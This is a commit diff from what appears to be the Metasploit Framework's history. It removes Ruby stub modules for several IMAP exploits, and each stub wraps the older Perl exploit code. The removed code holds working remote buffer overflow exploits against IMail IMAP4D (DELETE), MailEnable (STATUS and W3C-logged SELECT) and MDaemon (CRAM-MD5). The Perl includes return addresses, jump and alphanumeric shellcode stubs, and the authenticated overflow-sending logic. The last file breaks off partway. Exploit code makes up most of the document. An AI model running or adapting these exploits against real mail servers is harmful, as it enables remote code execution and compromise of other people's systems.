Imap exploits
Addition of MC as a common author Added the IMAP mixin Fixed bug in base64 git-svn-id: file:///home/svn/incoming/trunk@3172 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
86c5cf44c3
commit
6c2da4d313
|
@ -1,241 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'IMail IMAP4D Delete Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a buffer overflow in the 'DELETE'
|
|
||||||
command of the the IMail IMAP4D service. This vulnerability
|
|
||||||
can only be exploited with a valid username and password.
|
|
||||||
This flaw was patched in version 8.14.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'spoonm' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '11838'],
|
|
||||||
[ 'BID', '11675'],
|
|
||||||
[ 'MIL', '33'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 614,
|
|
||||||
'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5b\x5c\x5d\x5e\x5f\x60\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff",
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'win32',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Nov 12 2004',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::imail_imap_delete;
|
|
||||||
use strict;
|
|
||||||
use base 'Msf::Exploit';
|
|
||||||
use Msf::Socket::Tcp;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = {
|
|
||||||
};
|
|
||||||
|
|
||||||
my $info = {
|
|
||||||
'Name' => 'IMail IMAP4D Delete Overflow',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ],
|
|
||||||
|
|
||||||
'Arch' => [ 'x86' ],
|
|
||||||
'OS' => [ 'win32'],
|
|
||||||
'Priv' => 1,
|
|
||||||
|
|
||||||
'AutoOpts' =>
|
|
||||||
{
|
|
||||||
'GETPCTYPE' => 'edx',
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
},
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
|
||||||
'USER' => [1, 'DATA', 'IMAP Username'],
|
|
||||||
'PASS' => [1, 'DATA', 'IMAP Password'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
|
|
||||||
# give some stack space, align esp
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
'Space' => 614,
|
|
||||||
'BadChars' =>
|
|
||||||
|
|
||||||
# hd's evil map
|
|
||||||
join('', map { $_=chr($_) } (0x00 .. 0x2f)).
|
|
||||||
join('', map { $_=chr($_) } (0x3a .. 0x40)).
|
|
||||||
join('', map { $_=chr($_) } (0x5b .. 0x60)).
|
|
||||||
join('', map { $_=chr($_) } (0x7b .. 0xff)),
|
|
||||||
'MinNops' => 0,
|
|
||||||
'MaxNops' => 0,
|
|
||||||
},
|
|
||||||
|
|
||||||
'Encoder' =>
|
|
||||||
{
|
|
||||||
'Keys' => ['+alphanum'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
This module exploits a buffer overflow in the 'DELETE' command of the
|
|
||||||
the IMail IMAP4D service. This vulnerability can only be exploited with
|
|
||||||
a valid username and password. This flaw was patched in version 8.14.
|
|
||||||
}),
|
|
||||||
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['OSVDB', '11838'],
|
|
||||||
['BID', '11675'],
|
|
||||||
['MIL', '33'],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
|
|
||||||
# alphanum rets :(, will look more into it later
|
|
||||||
['Windows XP sp0 comctl32.dll', 0x77364650],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Keys' => ['imap'],
|
|
||||||
|
|
||||||
'DisclosureDate' => 'Nov 12 2004',
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
|
|
||||||
my $targetHost = $self->GetVar('RHOST');
|
|
||||||
my $targetPort = $self->GetVar('RPORT');
|
|
||||||
my $targetIndex = $self->GetVar('TARGET');
|
|
||||||
my $user = $self->GetVar('USER');
|
|
||||||
my $pass = $self->GetVar('PASS');
|
|
||||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
|
||||||
my $shellcode = $encodedPayload->Payload;
|
|
||||||
my $target = $self->Targets->[$targetIndex];
|
|
||||||
|
|
||||||
my $sock = Msf::Socket::Tcp->new(
|
|
||||||
'PeerAddr' => $targetHost,
|
|
||||||
'PeerPort' => $targetPort,
|
|
||||||
);
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
|
||||||
|
|
||||||
my $evil = "a001 LOGIN $user $pass\r\n";
|
|
||||||
$sock->Send($evil);
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Socket error: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
if($resp !~ /^a001 OK LOGIN/) {
|
|
||||||
$self->PrintLine('Login error: ' . $resp);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
$self->PrintLine('[*] Logged in, sending overflow');
|
|
||||||
|
|
||||||
$evil = 'A683 DELETE ';
|
|
||||||
|
|
||||||
# shellcode
|
|
||||||
$evil .= $shellcode;
|
|
||||||
$evil .= 'B' x ($self->PayloadSpace - length($shellcode));
|
|
||||||
|
|
||||||
# $evil .= $self->_Stupid(614);
|
|
||||||
# jmp over code
|
|
||||||
$evil .= "\x74\x32\x75\x30";
|
|
||||||
|
|
||||||
# ret addr
|
|
||||||
$evil .= pack('V', $target->[1]);
|
|
||||||
|
|
||||||
# space
|
|
||||||
$evil .= Pex::Text::AlphaNumText(44);
|
|
||||||
|
|
||||||
# get eip code
|
|
||||||
$evil .=
|
|
||||||
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59".
|
|
||||||
"\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59";
|
|
||||||
|
|
||||||
# alphanum encoded jmp back (edx context)
|
|
||||||
$evil .=
|
|
||||||
"\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41".
|
|
||||||
"\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
|
|
||||||
"\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57".
|
|
||||||
"\x70\x55\x50\x4b\x4f\x6b\x52\x6a";
|
|
||||||
|
|
||||||
# run off the stack, so we don't kill our payload, or something...
|
|
||||||
$evil .= Pex::Text::AlphaNumText(600);
|
|
||||||
|
|
||||||
$evil .= "\r\n";
|
|
||||||
|
|
||||||
# hopefully this works...
|
|
||||||
$sock->Send($evil);
|
|
||||||
|
|
||||||
$sock->Send($evil);
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
if(length($resp)) {
|
|
||||||
$self->PrintLine('[*] Got response, bad: ' . $resp);
|
|
||||||
}
|
|
||||||
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,195 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
MailEnable's IMAP server contains a buffer overflow
|
|
||||||
vulnerability in the STATUS command. With proper
|
|
||||||
credentials, this could allow for the execution of arbitrary
|
|
||||||
code.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'y0 <y0@w00t-shell.net>' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'CVE', '2005-2278'],
|
|
||||||
[ 'BID', '14243'],
|
|
||||||
[ 'NSS', '19193'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 450,
|
|
||||||
'BadChars' => "\x00\x0a\x0d\x20",
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'win32, winnt, win2000, winxp, win2003',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Jul 13 2005',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::mailenable_imap;
|
|
||||||
use strict;
|
|
||||||
use base 'Msf::Exploit';
|
|
||||||
use Msf::Socket::Tcp;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = {
|
|
||||||
};
|
|
||||||
|
|
||||||
my $info = {
|
|
||||||
'Name' => 'MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
|
|
||||||
'Arch' => [ 'x86' ],
|
|
||||||
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
|
|
||||||
'Priv' => 1,
|
|
||||||
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
|
||||||
'USER' => [1, 'DATA', 'IMAP Username'],
|
|
||||||
'PASS' => [1, 'DATA', 'IMAP Password'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'AutoOpts' => { 'EXITFUNC' => 'thread' },
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 450,
|
|
||||||
'BadChars' => "\x00\x0a\x0d\x20",
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
'Keys' => ['+ws2ord'],
|
|
||||||
},
|
|
||||||
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
MailEnable's IMAP server contains a buffer overflow vulnerability
|
|
||||||
in the STATUS command. With proper credentials, this could allow
|
|
||||||
for the execution of arbitrary code.
|
|
||||||
}),
|
|
||||||
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['CVE','2005-2278'],
|
|
||||||
['BID', '14243' ],
|
|
||||||
['NSS', '19193' ],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['MailEnable 1.54 Pro Universal', 9273, 0x1001c019], #MEAISP.DLL
|
|
||||||
['Windows XP Pro SP0/SP1 English', 9273, 0x71aa32ad ],
|
|
||||||
['Windows 2000 Pro English ALL', 9273, 0x75022ac4 ],
|
|
||||||
['Windows 2003 Server English', 9273, 0x7ffc0638 ],
|
|
||||||
],
|
|
||||||
|
|
||||||
'Keys' => ['imap'],
|
|
||||||
|
|
||||||
'DisclosureDate' => 'Jul 13 2005',
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
my $targetHost = $self->GetVar('RHOST');
|
|
||||||
my $targetPort = $self->GetVar('RPORT');
|
|
||||||
my $targetIndex = $self->GetVar('TARGET');
|
|
||||||
my $user = $self->GetVar('USER');
|
|
||||||
my $pass = $self->GetVar('PASS');
|
|
||||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
|
||||||
my $shellcode = $encodedPayload->Payload;
|
|
||||||
my $target = $self->Targets->[$targetIndex];
|
|
||||||
|
|
||||||
my $sock = Msf::Socket::Tcp->new(
|
|
||||||
'PeerAddr' => $targetHost,
|
|
||||||
'PeerPort' => $targetPort,
|
|
||||||
);
|
|
||||||
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1, 3);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
|
||||||
|
|
||||||
my $sploit = "a001 LOGIN $user $pass\r\n";
|
|
||||||
$sock->Send($sploit);
|
|
||||||
my $resp = $sock->Recv(-1, 3);
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Socket error: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
if($resp !~ /^a001 OK LOGIN/) {
|
|
||||||
$self->PrintLine('Login error: ' . $resp);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
$self->PrintLine('[*] Logged in, sending overflow...');
|
|
||||||
my $splat = Pex::Text::UpperCaseText($target->[1]);
|
|
||||||
|
|
||||||
$sploit =
|
|
||||||
"a001 STATUS ". '".'. "\x00".
|
|
||||||
$splat. "\xeb\x06". pack('V', $target->[2]). $shellcode.
|
|
||||||
'"'. " (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)". "\r\n";
|
|
||||||
|
|
||||||
$sock->Send($sploit);
|
|
||||||
my $resp = $sock->Recv(-1, 3);
|
|
||||||
if(length($resp)) {
|
|
||||||
$self->PrintLine('[*] Got response, bad: ' . $resp);
|
|
||||||
}
|
|
||||||
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,220 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a buffer overflow in the W3C logging
|
|
||||||
functionality of the MailEnable IMAPD service. Logging is
|
|
||||||
not enabled by default and this exploit requires a valid
|
|
||||||
username and password to exploit the flaw. MailEnable
|
|
||||||
Professional version 1.6 and prior and MailEnable Enterprise
|
|
||||||
version 1.1 and prior are affected.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'y0 <y0@w00t-shell.net>' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'BID', '15006'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 600,
|
|
||||||
'BadChars' => "\x00\x0a\x0d\x20",
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'win32, winnt, win2000, winxp, win2003',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => '',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::mailenable_imap_w3c;
|
|
||||||
use strict;
|
|
||||||
use base 'Msf::Exploit';
|
|
||||||
use Msf::Socket::Tcp;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = {
|
|
||||||
};
|
|
||||||
|
|
||||||
my $info = {
|
|
||||||
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
|
|
||||||
'Arch' => [ 'x86' ],
|
|
||||||
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
|
|
||||||
'Priv' => 1,
|
|
||||||
'AutoOpts' =>
|
|
||||||
{
|
|
||||||
'EXITFUNC' => 'thread',
|
|
||||||
},
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
'RHOST' => [1, 'ADDR', 'The target address'],
|
|
||||||
'RPORT' => [1, 'PORT', 'The target port', 143],
|
|
||||||
'USER' => [1, 'DATA', 'IMAP Username'],
|
|
||||||
'PASS' => [1, 'DATA', 'IMAP Password'],
|
|
||||||
|
|
||||||
},
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
|
|
||||||
'Space' => 600,
|
|
||||||
'BadChars' => "\x00\x0a\x0d\x20",
|
|
||||||
'Keys' => ['+ws2ord'],
|
|
||||||
},
|
|
||||||
'Description' => Pex::Text::Freeform(qq{
|
|
||||||
This module exploits a buffer overflow in the W3C logging
|
|
||||||
functionality of the MailEnable IMAPD service. Logging is not
|
|
||||||
enabled by default and this exploit requires a valid username
|
|
||||||
and password to exploit the flaw. MailEnable Professional version
|
|
||||||
1.6 and prior and MailEnable Enterprise version 1.1 and prior are
|
|
||||||
affected.
|
|
||||||
}),
|
|
||||||
'Refs' =>
|
|
||||||
[
|
|
||||||
['BID', 15006],
|
|
||||||
],
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
|
|
||||||
],
|
|
||||||
'Keys' => ['imap'],
|
|
||||||
};
|
|
||||||
|
|
||||||
sub new {
|
|
||||||
my $class = shift;
|
|
||||||
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
|
|
||||||
|
|
||||||
return($self);
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Check {
|
|
||||||
my ($self) = @_;
|
|
||||||
my $target_host = $self->GetVar('RHOST');
|
|
||||||
my $target_port = $self->GetVar('RPORT');
|
|
||||||
|
|
||||||
my $s = Msf::Socket::Tcp->new
|
|
||||||
(
|
|
||||||
'PeerAddr' => $target_host,
|
|
||||||
'PeerPort' => 25,
|
|
||||||
'LocalPort' => $self->GetVar('CPORT'),
|
|
||||||
'SSL' => $self->GetVar('SSL'),
|
|
||||||
);
|
|
||||||
|
|
||||||
if ($s->IsError) {
|
|
||||||
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
|
|
||||||
return $self->CheckCode('Connect');
|
|
||||||
}
|
|
||||||
|
|
||||||
$s->Send("QUIT\r\n");
|
|
||||||
my $res = $s->Recv(-1, 20);
|
|
||||||
$s->Close();
|
|
||||||
|
|
||||||
if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
|
|
||||||
$self->PrintLine("[*] This server does not appear to be vulnerable.");
|
|
||||||
return $self->CheckCode('Safe');
|
|
||||||
}
|
|
||||||
|
|
||||||
$self->PrintLine("[*] Vulnerable installation detected :-)");
|
|
||||||
return $self->CheckCode('Detected');
|
|
||||||
}
|
|
||||||
|
|
||||||
sub Exploit {
|
|
||||||
my $self = shift;
|
|
||||||
|
|
||||||
my $targetHost = $self->GetVar('RHOST');
|
|
||||||
my $targetPort = $self->GetVar('RPORT');
|
|
||||||
my $targetIndex = $self->GetVar('TARGET');
|
|
||||||
my $user = $self->GetVar('USER');
|
|
||||||
my $pass = $self->GetVar('PASS');
|
|
||||||
my $encodedPayload = $self->GetVar('EncodedPayload');
|
|
||||||
my $shellcode = $encodedPayload->Payload;
|
|
||||||
my $target = $self->Targets->[$targetIndex];
|
|
||||||
|
|
||||||
my $sock = Msf::Socket::Tcp->new(
|
|
||||||
'PeerAddr' => $targetHost,
|
|
||||||
'PeerPort' => $targetPort,
|
|
||||||
);
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Error creating socket: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
chomp($resp);
|
|
||||||
$self->PrintLine('[*] Got Banner: ' . $resp);
|
|
||||||
|
|
||||||
my $sploit = "a01 LOGIN $user $pass\r\n";
|
|
||||||
$sock->Send($sploit);
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
if($sock->IsError) {
|
|
||||||
$self->PrintLine('Socket error: ' . $sock->GetError);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
if($resp !~ /^a01 BAD LOGIN-/) {
|
|
||||||
$self->PrintLine('Login error: ' . $resp);
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
$self->PrintLine('[*] Logged in, sending overflow');
|
|
||||||
|
|
||||||
my $splat = Pex::Text::AlphaNumText(6196);
|
|
||||||
$sploit =
|
|
||||||
"a01 SELECT ". $splat.
|
|
||||||
"\xeb\x06". pack('V', $target->[1]).
|
|
||||||
$shellcode. "\r\n";
|
|
||||||
|
|
||||||
$sock->Send($sploit);
|
|
||||||
|
|
||||||
my $resp = $sock->Recv(-1);
|
|
||||||
if(length($resp)) {
|
|
||||||
$self->PrintLine('[*] Got response, bad: ' . $resp);
|
|
||||||
}
|
|
||||||
|
|
||||||
return;
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
1;
|
|
||||||
|
|
||||||
=end
|
|
||||||
|
|
||||||
|
|
||||||
end
|
|
||||||
end
|
|
|
@ -1,196 +0,0 @@
|
||||||
require 'msf/core'
|
|
||||||
|
|
||||||
module Msf
|
|
||||||
|
|
||||||
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
|
|
||||||
|
|
||||||
include Exploit::Remote::Tcp
|
|
||||||
|
|
||||||
def initialize(info = {})
|
|
||||||
super(update_info(info,
|
|
||||||
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
|
|
||||||
'Description' => %q{
|
|
||||||
This module exploits a buffer overflow in the CRAM-MD5
|
|
||||||
authentication of the MDaemon IMAP service. This
|
|
||||||
vulnerability was discovered by Muts.
|
|
||||||
|
|
||||||
},
|
|
||||||
'Author' => [ 'anonymous' ],
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'References' =>
|
|
||||||
[
|
|
||||||
[ 'OSVDB', '11838'],
|
|
||||||
[ 'CVE', '2004-1520'],
|
|
||||||
[ 'BID', '11675'],
|
|
||||||
[ 'MIL', '90'],
|
|
||||||
|
|
||||||
],
|
|
||||||
'Privileged' => true,
|
|
||||||
'Payload' =>
|
|
||||||
{
|
|
||||||
'Space' => 500,
|
|
||||||
'BadChars' => "\x00",
|
|
||||||
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44",
|
|
||||||
|
|
||||||
},
|
|
||||||
'Targets' =>
|
|
||||||
[
|
|
||||||
[
|
|
||||||
'Automatic Targetting',
|
|
||||||
{
|
|
||||||
'Platform' => 'win32',
|
|
||||||
'Ret' => 0x0,
|
|
||||||
},
|
|
||||||
],
|
|
||||||
],
|
|
||||||
'DisclosureDate' => 'Nov 12 2004',
|
|
||||||
'DefaultTarget' => 0))
|
|
||||||
end
|
|
||||||
|
|
||||||
def exploit
|
|
||||||
connect
|
|
||||||
|
|
||||||
handler
|
|
||||||
disconnect
|
|
||||||
end
|
|
||||||
|
|
||||||
=begin
|
|
||||||
|
|
||||||
##
|
|
||||||
# This file is part of the Metasploit Framework and may be redistributed
|
|
||||||
# according to the licenses defined in the Authors field below. In the
|
|
||||||
# case of an unknown or missing license, this file defaults to the same
|
|
||||||
# license as the core Framework (dual GPLv2 and Artistic). The latest
|
|
||||||
# version of the Framework can always be obtained from metasploit.com.
|
|
||||||
##
|
|
||||||
|
|
||||||
package Msf::Exploit::mdaemon_imap_cram_md5;
|
|
||||||
use strict;
|
|
||||||
use base 'Msf::Exploit';
|
|
||||||
use Msf::Socket::Tcp;
|
|
||||||
use Pex::Text;
|
|
||||||
|
|
||||||
my $advanced = { };
|
|
||||||
|
|
||||||
my $info = {
|
|
||||||
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
|
|
||||||
'Version' => '$Revision$',
|
|
||||||
'Authors' => [ 'anonymous' ],
|
|
||||||
|
|
||||||
'Arch' => [ 'x86' ],
|
|
||||||
'OS' => [ 'win32'],
|
|
||||||
'Priv' => 1,
|
|
||||||
|
|
||||||
'AutoOpts' => { 'EXITFUNC' => 'process' },
|
|
||||||
'UserOpts' =>
|
|
||||||
{
|
|
||||||
